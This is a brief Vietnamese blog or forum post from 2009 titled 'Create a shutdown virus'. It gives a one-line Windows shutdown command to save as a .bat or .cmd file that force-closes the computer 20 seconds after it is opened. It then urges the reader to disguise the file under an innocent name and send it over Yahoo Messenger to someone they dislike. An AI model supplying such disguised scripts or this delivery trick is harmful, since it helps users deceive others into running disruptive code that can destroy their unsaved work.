Tạo Virus Tắt Máy

2009-01-13 15:48

Shutdown máy tính bằng Virut cực đơn giản:

Dùng Notepad đánh lệnh:


shutdown -s -t 20 -c "Shutdown nhe" -f

save lại thành file *.bat hoặc *.cmd là Ok

Số 20 là thời gian sau khi click file để shutdown và tính bằng giây.
Sau đó gửi file vừa tạo cho victim... click vào là chít đóa.
khi` khi`!bạn có thễ để tên nó là trungthu.cmd gữi wa YH cho thằng nào mà bạn ghét! Nó open lên và 20 giây sau nó die

Back

Topic: Tạo Virus Tắt Máy

No comments found.